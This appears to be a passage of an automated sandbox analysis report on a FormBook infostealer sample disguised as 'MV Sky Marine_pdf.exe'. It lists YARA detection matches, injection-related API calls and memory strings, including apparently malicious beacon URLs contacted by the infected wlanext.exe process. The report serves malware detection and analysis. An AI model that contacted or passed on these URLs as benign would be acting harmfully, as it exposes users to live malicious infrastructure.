          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo-dark
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo-dark.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/prlx-bg-main.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWK
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040514E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0040514E

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: MV Sky Marine_pdf.exe
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_004181B0 NtCreateFile | 3_2_004181B0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00418260 NtReadFile | 3_2_00418260
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_004182E0 NtClose | 3_2_004182E0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00418390 NtAllocateVirtualMemory | 3_2_00418390
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041838D NtAllocateVirtualMemory | 3_2_0041838D
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk | 3_2_00AF98F0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk | 3_2_00AF9860
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk | 3_2_00AF9840
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk | 3_2_00AF99A0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 3_2_00AF9910
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk | 3_2_00AF9A20
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk | 3_2_00AF9A00
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk | 3_2_00AF9A50
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF95D0 NtClose,LdrInitializeThunk | 3_2_00AF95D0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk | 3_2_00AF9540
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk | 3_2_00AF96E0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk | 3_2_00AF9660
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk | 3_2_00AF97A0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk | 3_2_00AF9780
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk | 3_2_00AF9FE0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk | 3_2_00AF9710
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF98A0 NtWriteVirtualMemory | 3_2_00AF98A0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9820 NtEnumerateKey | 3_2_00AF9820
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AFB040 NtSuspendThread | 3_2_00AFB040
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF99D0 NtCreateProcessEx | 3_2_00AF99D0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9950 NtQueueApcThread | 3_2_00AF9950
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9A80 NtOpenDirectoryObject | 3_2_00AF9A80
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9A10 NtQuerySection | 3_2_00AF9A10
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AFA3B0 NtGetContextThread | 3_2_00AFA3B0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9B00 NtSetValueKey | 3_2_00AF9B00
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF95F0 NtQueryInformationFile | 3_2_00AF95F0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9520 NtWaitForSingleObject | 3_2_00AF9520
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AFAD30 NtSetContextThread | 3_2_00AFAD30
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9560 NtWriteFile | 3_2_00AF9560
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF96D0 NtCreateKey | 3_2_00AF96D0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9610 NtEnumerateValueKey | 3_2_00AF9610
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9670 NtQueryInformationProcess | 3_2_00AF9670
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9650 NtQueryValueKey | 3_2_00AF9650
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9730 NtQueryVirtualMemory | 3_2_00AF9730
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AFA710 NtOpenProcessToken | 3_2_00AFA710
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9760 NtOpenProcess | 3_2_00AF9760
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AF9770 NtSetInformationFile | 3_2_00AF9770
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AFA770 NtOpenThread | 3_2_00AFA770
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_004181B0 NtCreateFile | 3_1_004181B0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00418260 NtReadFile | 3_1_00418260
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_004182E0 NtClose | 3_1_004182E0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00418390 NtAllocateVirtualMemory | 3_1_00418390
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041838D NtAllocateVirtualMemory | 3_1_0041838D
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399710 NtQueryInformationToken,LdrInitializeThunk | 8_2_03399710
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399780 NtMapViewOfSection,LdrInitializeThunk | 8_2_03399780
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399FE0 NtCreateMutant,LdrInitializeThunk | 8_2_03399FE0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399660 NtAllocateVirtualMemory,LdrInitializeThunk | 8_2_03399660
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399A50 NtCreateFile,LdrInitializeThunk | 8_2_03399A50
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399650 NtQueryValueKey,LdrInitializeThunk | 8_2_03399650
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033996E0 NtFreeVirtualMemory,LdrInitializeThunk | 8_2_033996E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033996D0 NtCreateKey,LdrInitializeThunk | 8_2_033996D0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399910 NtAdjustPrivilegesToken,LdrInitializeThunk | 8_2_03399910
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399540 NtReadFile,LdrInitializeThunk | 8_2_03399540
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033999A0 NtCreateSection,LdrInitializeThunk | 8_2_033999A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033995D0 NtClose,LdrInitializeThunk | 8_2_033995D0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399860 NtQuerySystemInformation,LdrInitializeThunk | 8_2_03399860
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399840 NtDelayExecution,LdrInitializeThunk | 8_2_03399840
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399730 NtQueryVirtualMemory | 8_2_03399730
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0339A710 NtOpenProcessToken | 8_2_0339A710
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399B00 NtSetValueKey | 8_2_03399B00
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399770 NtSetInformationFile | 8_2_03399770
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0339A770 NtOpenThread | 8_2_0339A770
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399760 NtOpenProcess | 8_2_03399760
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0339A3B0 NtGetContextThread | 8_2_0339A3B0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033997A0 NtUnmapViewOfSection | 8_2_033997A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399A20 NtResumeThread | 8_2_03399A20
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399610 NtEnumerateValueKey | 8_2_03399610
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399A10 NtQuerySection | 8_2_03399A10
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399A00 NtProtectVirtualMemory | 8_2_03399A00
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399670 NtQueryInformationProcess | 8_2_03399670
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399A80 NtOpenDirectoryObject | 8_2_03399A80
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0339AD30 NtSetContextThread | 8_2_0339AD30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399520 NtWaitForSingleObject | 8_2_03399520
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399560 NtWriteFile | 8_2_03399560
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399950 NtQueueApcThread | 8_2_03399950
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033995F0 NtQueryInformationFile | 8_2_033995F0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033999D0 NtCreateProcessEx | 8_2_033999D0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03399820 NtEnumerateKey | 8_2_03399820
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0339B040 NtSuspendThread | 8_2_0339B040
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033998A0 NtWriteVirtualMemory | 8_2_033998A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_033998F0 NtReadVirtualMemory | 8_2_033998F0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA81B0 NtCreateFile | 8_2_00AA81B0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA82E0 NtClose | 8_2_00AA82E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA8260 NtReadFile | 8_2_00AA8260
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA8390 NtAllocateVirtualMemory | 8_2_00AA8390
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AA838D NtAllocateVirtualMemory | 8_2_00AA838D
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_0040326F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess | 2_2_0040326F
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 2_2_0040495F | 2_2_0040495F
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00401030 | 3_2_00401030
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041C24C | 3_2_0041C24C
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041CB40 | 3_2_0041CB40
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00408C4C | 3_2_00408C4C
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00408C50 | 3_2_00408C50
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041C4AE | 3_2_0041C4AE
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00402D90 | 3_2_00402D90
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_0041B778 | 3_2_0041B778
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE20A0 | 3_2_00AE20A0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B820A8 | 3_2_00B820A8
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACB090 | 3_2_00ACB090
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B828EC | 3_2_00B828EC
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B71002 | 3_2_00B71002
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD4120 | 3_2_00AD4120
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ABF900 | 3_2_00ABF900
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B822AE | 3_2_00B822AE
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AEEBB0 | 3_2_00AEEBB0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B7DBD2 | 3_2_00B7DBD2
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B82B28 | 3_2_00B82B28
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AC841F | 3_2_00AC841F
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B7D466 | 3_2_00B7D466
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AE2581 | 3_2_00AE2581
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00ACD5E0 | 3_2_00ACD5E0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B825DD | 3_2_00B825DD
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AB0D20 | 3_2_00AB0D20
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B82D07 | 3_2_00B82D07
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B81D55 | 3_2_00B81D55
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B82EF7 | 3_2_00B82EF7
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00AD6E30 | 3_2_00AD6E30
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_2_00B81FF1 | 3_2_00B81FF1
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00401030 | 3_1_00401030
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041C24C | 3_1_0041C24C
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041CB40 | 3_1_0041CB40
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00408C4C | 3_1_00408C4C
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00408C50 | 3_1_00408C50
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_0041C4AE | 3_1_0041C4AE
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: 3_1_00402D90 | 3_1_00402D90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0338EBB0 | 8_2_0338EBB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03376E30 | 8_2_03376E30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03350D20 | 8_2_03350D20
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03421D55 | 8_2_03421D55
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03374120 | 8_2_03374120
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0335F900 | 8_2_0335F900
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_03411002 | 8_2_03411002
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_0336B090 | 8_2_0336B090
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AACB40 | 8_2_00AACB40
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00AAC4AE | 8_2_00AAC4AE
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A98C4C | 8_2_00A98C4C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A98C50 | 8_2_00A98C50
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A92D90 | 8_2_00A92D90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 8_2_00A92FB0 | 8_2_00A92FB0
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: String function: 0041A090 appears 38 times
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function: String function: 00ABB150 appears 35 times
Source: MV Sky Marine_pdf.exe | Static PE information: Resource name: RT_VERSION type: PDP-11 pure executable not stripped
Source: MV Sky Marine_pdf.exe, 00000002.00000003.228681580.0000000002FDF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sky Marine_pdf.exe
Source: MV Sky Marine_pdf.exe, 00000003.00000002.275956738.0000000000D3F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sky Marine_pdf.exe
Source: MV Sky Marine_pdf.exe, 00000003.00000002.275709400.0000000000A52000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs MV Sky Marine_pdf.exe
Source: MV Sky Marine_pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
